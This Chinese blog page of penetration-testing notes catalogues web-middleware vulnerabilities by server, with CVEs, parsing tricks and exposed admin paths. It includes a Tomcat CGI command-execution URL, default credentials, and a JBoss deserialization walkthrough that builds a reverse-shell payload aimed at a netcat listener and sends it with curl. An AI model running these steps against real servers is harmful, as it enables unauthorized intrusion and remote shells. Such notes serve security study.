之前看吐司别人发的个文档,简单记的笔记
-----
IIS
    解析漏洞
       IIS 6
           *.asp;.jpg会被当作asp解析
           *.asp/目录下的文件会被当作asp解析
           asa cdx cer后缀也会被当作asp解析
       IIS 7
           在Fast-CGI时,test.jpg在url后加/.php即可解析成php文件
    PUT任意文件写入
       开启了WebDAV并允许写入
    IIS短文件漏洞
    CVE-2017-7269
       2003 r2 IIS 6 开启WebDAV

Apache
    解析漏洞
       未知扩展名解析漏洞
           1.php.xxx
       AddHandler导致的解析漏洞
           如果有"AddHandler application/x-httpd-php .php",只要有.php后缀即可a.php.jpg
       HTTPD换行解析漏洞 CVE-2017-15715
           影响2.4.0-2.4.29
           上传时文件名为phpinfo.php换行符,访问/phpinfo.php%0a

Nginx
    Nginx配置文件错误导致的解析漏洞
       info.jpg/1.php
    Nginx空字节任意代码执行漏洞 0.5 0.6 0.7-0.7.65 0.8-0.8.37
       webshell名为a.jpg 访问a.jpg空字节.php
    Nginx文件名逻辑漏洞 0.8.41-1.4.3 1.5.0-1.5.7
       上传时为a.jpg空格,访问a.jpg空格空字节.php
    Nginx配置错误导致的安全问题
       目录穿越
           在配置别名时,忘记加/   访问/files../
location /files {
   autoindex on;
   alias c:/WWW/home/;
}
        目录遍历 autoindex 为on

Tomcat
    任意文件写入CVE-2017-12615
       conf/web.xml配置了readonly=false,可以往服务器PUT文件
    Tomcat远程代码执行 CVE-2019-0232
       9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 , 7.0.0 ~ 7.0.93
随意上传lxhsec.bat
 
http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user
   Tomcat + 弱口令 && 后台getshell漏洞
   Tomcat manager App 暴力破解

JBoss 默认端口8080 9990
    JBoss 5/6 反序列化漏洞 CVE-2017-12149
       访问/invoker/readonly 返回500说明存在页面
利用工具:JavaDeserH2HC,我们选择一个Gadget:ReverseShellCommonsCollectionsHashMap,编译并生成序列化数据:
   生成ReverseShellCommonsCollectionsHashMap.class
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
   生成ReverseShellCommonsCollectionsHashMap.ser
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip是nc所在的ip)
   利用:
curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
    JBoss JMXInvokerServlet反序列化漏洞
       /invoker/JMXInvokerServlet
    JBoss EJBInvokerServlet反序列化漏洞
       /invoker/EJBInvokerServlet
    JBoss <=4.x JBossMQ JMS反序列化漏洞 CVE-2017-7504
       /jbossmq-httpil/HTTPServerILServlet
    Administration Console弱口令
       /admin-console/
    JMX Console未授权访问
       /jmx-console/

WebLogic 默认端口7001
    XMLDecoder反序列化漏洞 CVE-2017-10271 & CVE-2017-3506
       /wls-wsat/
    wls9_async_response,wls-wsat反序列化漏洞 CVE-2019-2725
       /_async/
       /wls-wsat/
    WLS Core Components反序列化漏洞 CVE-2018-2628
        通过t3协议触发
    WebLogic任意文件上传漏洞 CVE-2018-2894 10.3.6.0 12.1.3.0, 12.2.1.2, 12.2.1.3
       /ws_utc/config.do
    Weblogic SSRF漏洞 CVE-2014-4210 10.0.2.0, 10.3.6.0
       /uddiexplorer/SearchPublicRegistries.jsp
    Weblogic弱口令后台getshell
       /console

 
GlassFish 默认端口:8080(Web应用端口,即网站内容),4848(GlassFish管理中心)
     GlassFish Directory Traversal(CVE-2017-1000028)    
       %c0%af作为/ 直接访问/META-INF下的敏感文件
    GlassFish 后台Getshell    

 
 
WebSphere
   Java反序列化(CVE-2015-7450)
       访问8880端口
    弱口令后台getshell
       6/7版本,后台只需输入admin,无需密码即可登录 websphere/ websphere system/ manager
 

web中间件常见漏洞总结笔记的更多相关文章

  1. Web中间件 - 常见漏洞总结

    *文章来源:https://blog.egsec.cn/archives/472 *本文将主要说明:Web中间件常见漏洞的产生原因以及修复方案 什么是Web中间件? 百度百科是这样解释的:中间件是介于 ...

  2. Web中间件常见漏洞总结

    一.IIS中间组件: 1.PUT漏洞 2.短文件名猜解 3.远程代码执行 4.解析漏洞 二.Apache中间组件: 1.解析漏洞 2.目录遍历 三.Nginx中间组件: 1.文件解析 2.目录遍历 3 ...

  3. Web中间件常见漏洞

    IIS Internet Information Services--windows 解析漏洞 IIS 6.x 基于文件名:该版本默认会将 *.asp;.jpg 此种格式的文件名,当成 Asp 解析, ...

  4. Web安全常见漏洞修复建议

    转载地址:https://security.pingan.com/blog/17.html SQL注入 在服务器端要对所有的输入数据验证有效性. 在处理输入之前,验证所有客户端提供的数据,包括所有的参 ...

  5. web中间件

    0x00 Web中间件概述 通俗来说,中间件是提供系统软件和应用软件之间连接的软件,以便于软件各部件之间的沟通.Apache的Tomcat.IBM公司的WebSphere.BEA公司的WebLogic ...

  6. 常见web中间件漏洞(一)IIS漏洞

    web中间件作为web安全的重要一块,经常会有人问balabala,虽然有很多已经人尽皆知并且基本不再构成威胁了,但是还是有必要说一下,了解历史,了解我们从哪里来 鉴于内容实在是太多,本来打算一起写完 ...

  7. 常见web中间件漏洞(四)Tomcat漏洞

    这部分好久没写了,继续更新web中间件漏洞思路整理(不复现) ,争取...整理完 前几篇指路链接: nginx: https://www.cnblogs.com/lcxblogs/p/13596239 ...

  8. web端常见安全漏洞测试结果分析-- appscan

    基于appscan测试结果分析: 一.XSS跨站脚本 指的是攻击者往Web页面里插入恶意html代码,通常是JavaScript编写的恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被 ...

  9. Web开发常见的几个漏洞解决方法 (转)

    基本上,参加的安全测试(渗透测试)的网站,可能或多或少存在下面几个漏洞:SQL注入漏洞.跨站脚本攻击漏洞.登陆后台管理页面.IIS短文件/文件夹漏洞.系统敏感信息泄露. 1.测试的步骤及内容 这些安全 ...

随机推荐

  1. 彻底理解CORS跨域原理

    背景 现在的前端开发中都是前后端分离的开发模式,数据的获取并非同源,所以跨域的问题在我们日常开发中特别常见.其实这种资料网上也是一搜一大堆,但是都不够全面,理解起来也不够透彻.这篇文章就结合具体的示例 ...

  2. [Python] 豆瓣电影top250爬虫

    1.分析 <li><div class="item">电影信息</div></li> 每个电影信息都是同样的格式,毕竟在服务器端是用 ...

  3. Docker 为非root用户授权

    Docker 为非root用户授权: 当运行docker pull busybox时候,会提示sky用户无法调用docker. 那么应该把sky用户加入docker用户组,不过在添加的时候,又提示了如 ...

  4. Scala Try Catch Finally

    Scala Try Catch Finally: 在Java中返回值优先级顺序:finally最高, try,catch 选其一,try中抛异常,返回catch,不抛异常,返回try,. public ...

  5. Egret资源跨域问题

    在服务器上配置了允许跨域还不够,还需要在引擎配置允许跨域,不然texture无法在webgl上下文中渲染 会报一个类似于The cross-origin image at 的错误, 只需要在egret ...

  6. springmvc中将servlet api对象作为处理方法的入参使用

    在springmvc中,控制器不依赖任何servlet api对象,也可以将servlet api对象作为处理方法的入参使用,非常方便,比如需要使用HttpSession对象,那么就可以直接将Http ...

  7. Java工程师学习指南(完结篇)

    Java工程师学习指南 完结篇 先声明一点,文章里面不会详细到每一步怎么操作,只会提供大致的思路和方向,给大家以启发,如果真的要一步一步指导操作的话,那至少需要一本书的厚度啦. 因为笔者还只是一名在校 ...

  8. LeetCode初级算法--字符串01:反转字符串

    LeetCode初级算法--字符串01:反转字符串 搜索微信公众号:'AI-ming3526'或者'计算机视觉这件小事' 获取更多算法.机器学习干货 csdn:https://blog.csdn.ne ...

  9. 深度长文回顾web基础组件

    什么是Serlvet ? 全称 server applet 运行在服务端的小程序: 首先来说,这个servlet是java语言编写的出来的应用程序,换句话说servlet拥有java语言全部的优点,比 ...

  10. 第3章(1) Linux内核相关概念

    Linux内核的组成 1. Linux内核源代码的目录结构 arch:包含和硬件体系结构相关的代码,每种平台占一个相应的目录,如 i386.arm. arm64.powerpc.mips 等.Linu ...